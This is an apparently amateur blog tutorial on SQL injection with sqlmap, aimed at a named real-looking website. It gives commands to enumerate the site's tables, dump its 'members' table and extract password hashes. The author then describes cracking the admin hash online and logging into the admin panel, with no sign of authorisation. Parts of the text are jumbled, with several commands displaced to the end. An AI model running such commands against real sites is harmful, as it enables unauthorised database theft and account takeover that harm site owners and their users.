SQLMap SQLMap is a tool used to detect SQL injection vulnerabilities and gain access to the database by exploiting these vulnerabilities. Now let's take a look at how it is used. Our target site -> How to link to our articles SQLMap Installation Before moving on to its use, let's briefly show the SQLMap installation.

sudo apt-get install sqlmap

The SQLMap Usage

sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --tables --answers="*"

-u parameter refers to the url,-uafter the parameter we enter the url we want to be scanned.

--tablesIf the scan is successful, we want it to print the tables in the database it obtains.

--answers="*"We answer yes to all questions.

After the scan, we found the tables. There is a striking table here, the members table. Now let's look at the columns in this table.We use the parameter to see the columns in the table.The parameter means table, next to it we write the table whose columns we want to see.instead to see the data inside the columns. Now that we have a hashed password and username, let's try to crack the hash.By chance, I managed to crack the hash using Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free online site. I type admin at the end of the target url and by chance I find the admin panel. All that remains is to log in using the password and username. And I'm inside . That's all I had to say. I hope it was a useful topic. By the way, sqlmap is a matter of luck, it doesn't work every time, you need to have some luck.



sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --columns -T members

--columns

-T



--columns--dump

sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --dump -T members

writen by cYber-coder